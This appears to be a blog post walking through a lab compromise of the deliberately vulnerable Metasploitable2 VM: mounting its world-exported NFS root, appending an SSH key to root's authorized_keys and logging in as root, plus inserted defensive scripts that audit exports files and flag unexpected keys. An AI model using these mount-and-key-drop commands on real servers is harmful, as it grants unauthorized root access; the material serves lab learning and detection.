Metasploiting NFS

Following on from my "getting Metasploitable2 running on KVM/QEMU" post, I thought I had better get round to trying to exploit some of the vulnerabilities on this intentionally vulnerable virtual machine.

The easiest place to start (so I thought) would be the low-hanging fruit of a poorly configured NFS server that exposes the entire filesystem of the target.

Before we walk through this, I will assume that we already know the address of the target machine. In order to save a little time, you can set the IP address of the target as a variable by doing the following:

    # TARGET="192.168.69.172"

Let's exploit

  1. Enumerate the target

    # nmap -sV $TARGET
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-02 21:14 BST
    Nmap scan report for 192.168.69.172
    Host is up (0.0052s latency).
    Not shown: 977 closed tcp ports (reset)
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec?
    513/tcp  open  login
    514/tcp  open  tcpwrapped
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    MAC Address: 00:0C:29:FA:DD:2A (VMware)
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 71.96 seconds
  2. Note that the NFS port (2049) is open, as well as SSH (port 22).

  3. Check what mounts are available

    # showmount -e $TARGET
    Export list for 192.168.69.172:
    / *

  4. Interesting: the filesystem root is exported as an NFS share to any client (the `*`). This means that we can remotely mount the entire filesystem and have read/write access.

  5. Next, mount the NFS share

    # mount -t nfs $TARGET:/ /mnt
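Seen from the server side, the weakness that showmount just revealed is a single line in /etc/exports. The script below is an added example (it is not code from the original post, and the sample file is not Metasploitable2's real exports file): it parses exports(5)-style lines and flags the settings that turn a root-filesystem export into a remote write primitive. The weak sample line mirrors what the walkthrough observed (/ exported to *); the no_root_squash option on it is an assumption for the demo, and the hardened line beside it shows what a defender would put in its place. Function names are my own.

```python
import re
from typing import Dict, FrozenSet, List, NamedTuple

# Constructed sample /etc/exports (not the target's real file).  The first line
# has the shape showmount reported in the walkthrough; no_root_squash is assumed
# for the demo.  The second line is a hardened equivalent.
SAMPLE_EXPORTS = """
/            *(rw,no_root_squash)                         # weak: whole fs, anyone, writable, remote root kept
/srv/share   192.168.69.0/24(ro,root_squash,sec=krb5p)   # hardened: one subtree, one subnet, read-only, Kerberos
"""


class Export(NamedTuple):
    path: str
    client: str
    options: FrozenSet[str]


def parse_exports(text: str) -> List[Export]:
    """Parse exports(5) lines: '<path> <client>(opt,opt) [<client>(opt) ...]'."""
    result = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()           # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:] or ["*"]  # a bare path is exported to everyone
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if m is None:
                raise ValueError(f"malformed client spec: {spec!r}")
            client = m.group(1) or "*"                 # '(rw)' with no client also means everyone
            opts = frozenset(o.strip() for o in (m.group(2) or "").split(",") if o.strip())
            result.append(Export(path, client, opts))
    return result


def audit_export(e: Export) -> List[str]:
    """Return the weaknesses one entry carries; an empty list means nothing was flagged."""
    findings = []
    if e.client == "*":
        findings.append("exported to any client")
    if e.path == "/":
        findings.append("filesystem root exported")
    if "rw" in e.options:
        findings.append("writable")
    if "no_root_squash" in e.options:
        findings.append("no_root_squash: remote uid 0 is root on the server")
    if "insecure" in e.options:
        findings.append("insecure: requests from unprivileged source ports accepted")
    if not any(o.startswith("sec=krb5") for o in e.options):
        # Default is sec=sys (AUTH_SYS): the server believes whatever uid the client claims.
        findings.append("AUTH_SYS only: client-asserted uids are trusted")
    return findings


def audit_exports(text: str) -> Dict[str, List[str]]:
    """Map '<path> <client>' -> findings for every entry in an exports file."""
    return {f"{e.path} {e.client}": audit_export(e) for e in parse_exports(text)}


if __name__ == "__main__":
    for entry, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(f"{entry}: {', '.join(findings) if findings else 'ok'}")
```

Run it against a copy of the real file pulled from the NFS server: any entry that combines "any client", "writable" and "no_root_squash" is exactly the condition that lets the next steps of this walkthrough drop a key into /root/.ssh. Note that even with root_squash, AUTH_SYS lets a client claim any non-zero uid, so restricting the client list (or moving to sec=krb5) matters as much as squashing root.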
  6. We can then create an SSH key pair on the attacking machine; in this case we can just press Enter when asked for a passphrase.

    # ssh-keygen
    Generating public/private rsa key pair.
    Enter file in which to save the key (/root/.ssh/id_rsa):
    Enter passphrase (empty for no passphrase):
    Enter same passphrase again:
    Your identification has been saved in /root/.ssh/id_rsa
    Your public key has been saved in /root/.ssh/id_rsa.pub
    The key fingerprint is:
    SHA256:BdSwHNhDnG5RQjnnyUz1V5WA08DqIc2MbNg89gRN6lU root@kali
    The key's randomart image is:
    +---[RSA 3072]----+
    |       B@BoE=.. =|
    |      .oX*=+ o ..|
    |      =oO@o.. . .|
    |     ..X+O=    . |
    |      ooS .      |
    |         o       |
    |                 |
    |                 |
    |                 |
    +----[SHA256]-----+

  7. We need to append the contents of the newly created id_rsa.pub to the authorized_keys file for the root user, via the mounted filesystem.

    # cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
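The key-drop step above leaves a tell-tale artefact on the server: an extra line in root's authorized_keys. The script below is an added example (not code from the original post) of the detection a defender would run against that file: it fingerprints every key the way `ssh-keygen -lf` does (SHA-256 over the decoded key blob, base64 without padding) and reports lines that a known-good baseline does not contain. Every key in it is a constructed toy value, not a real key, and the function names are my own.

```python
import base64
import hashlib
import struct
from typing import Dict, List

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def _ssh_string(b: bytes) -> bytes:
    """Encode one SSH wire-format string (uint32 big-endian length + bytes)."""
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(n: int) -> bytes:
    """Encode an SSH mpint: minimal big-endian bytes, with a leading 0x00 if the top bit is set."""
    raw = n.to_bytes((n.bit_length() + 8) // 8, "big")   # +8 forces the extra zero byte when needed
    return _ssh_string(raw)


def make_rsa_pubkey_line(e: int, n: int, comment: str) -> str:
    """Build a constructed 'ssh-rsa <base64 blob> <comment>' line from e and n.
    The modulus here is a toy; only the wire layout and the fingerprint are exercised."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def fingerprint(pubkey_line: str) -> str:
    """SHA256 fingerprint in the form ssh-keygen prints: 'SHA256:<base64 without padding>'."""
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> Dict[str, str]:
    """Map fingerprint -> full line for every key line; comments and blanks are skipped."""
    keys = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Options may precede the key type, e.g. 'from="10.0.0.1" ssh-rsa AAAA...';
        # locate the key type field and fingerprint from there.
        fields = line.split()
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None:
            continue
        keys[fingerprint(" ".join(fields[idx:]))] = line
    return keys


def unexpected_keys(baseline: str, current: str) -> List[str]:
    """Return lines in the current file whose key fingerprint is absent from the baseline."""
    known = parse_authorized_keys(baseline)
    return [line for fp, line in parse_authorized_keys(current).items() if fp not in known]


# Constructed keys: toy RSA parameters, NOT usable keys (n is far too small).
ADMIN_KEY = make_rsa_pubkey_line(65537, 0xC0FFEE_1234_5678_9ABC_DEF0_1357_9BDF, "admin@workstation")
ROGUE_KEY = make_rsa_pubkey_line(65537, 0xBAD1DEA_FEED_FACE_0123_4567_89AB_CDEF, "root@kali")

BASELINE = f"# keys approved for root on the NFS server (constructed baseline)\n{ADMIN_KEY}\n"
# What the file looks like after an append such as 'cat id_rsa.pub >> authorized_keys':
CURRENT = BASELINE + ROGUE_KEY + "\n"

if __name__ == "__main__":
    for line in unexpected_keys(BASELINE, CURRENT):
        print(f"UNEXPECTED {fingerprint(line)} {line.split()[-1]}")
```

Keying the comparison on the fingerprint rather than the raw line means a rogue key cannot hide behind a re-used comment or added options, and a re-formatted legitimate key does not raise a false alarm. A scheduled diff like this against a baseline held off the box (or a file-integrity alert on /root/.ssh) is the cheapest detection for the step above.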
  8. Now try to SSH into the target machine

    # ssh -i ~/.ssh/id_rsa root@$TARGET

  9. In my case, I receive the following error:

    Unable to negotiate with 192.168.69.172 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

  10. To get past this error, I needed to specify a few options that (in my experience) are not usually needed: the client has to be told to accept the server's ssh-rsa host key and to offer the ssh-rsa public key type.

    # ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa -i ~/.ssh/id_rsa root@$TARGET
    Last login: Sat Mar 25 19:49:16 2023 from :0.0
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    You have new mail.
    root@metasploitable:~#

  11. We're now in as root and have "owned" the machine.

Conclusion

In theory this should have been a straightforward exploit: copy your key to the target using the NFS filesystem, and SSH in.

In this case I had been following a few guides on how to use the poorly configured NFS implementation, but I struggled with the error message that I was receiving. It seems that the configuration of this target had perhaps changed since those guides were written (even the guide on Rapid7's own website did not work for this): it did not accept the key generated by the ssh-keygen command. Having tried a few different options to generate the key, and having tried to own the 'msfadmin' user instead of the root user (I had suspected some permissions issue), I had to do some digging around and eventually found an answer in a Stack Overflow thread. So if at first you do not succeed, do not lose heart; keep digging, keep trying different things.

If that does not work, then take a break - in my case here I took a few days break from it, sat down and cracked it on the first attempt.